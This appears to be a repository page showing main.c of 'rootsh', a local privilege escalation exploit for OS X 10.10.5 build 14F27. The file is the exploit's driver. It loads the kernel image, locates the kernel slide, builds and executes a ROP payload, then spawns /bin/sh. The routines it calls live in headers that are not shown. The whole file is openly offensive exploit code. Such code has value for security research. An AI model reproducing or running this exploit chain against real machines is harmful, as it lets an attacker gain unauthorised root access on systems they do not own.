README.md
Rendering markdown...
/* main.c
* Brandon Azad
*
* Entry point for rootsh, a local privilege escalation on OS X 10.10.5 build
* 14F27.
*/
#include "kernel_image.h"
#include "kernel_slide.h"
#include "kernel_rop.h"
#include <stdio.h>
#include <unistd.h>
int
main(int argc, char * argv[]) {
if ((uint32_t)main < 0x8000) {
execve(argv[0], argv, NULL);
}
sync(); /* Finalize any writes to the filesystem in case we crash. */
int err = load_kernel();
if (err) {
return err;
}
err = find_kernel_slide();
if (err) {
return err;
}
err = build_rop_payload();
if (err) {
return err;
}
err = execute_rop_payload();
if (err) {
return err;
}
argv[0] = "/bin/sh";
execve(argv[0], argv, NULL);
printf("error: could not exec shell\n");
return 1;
}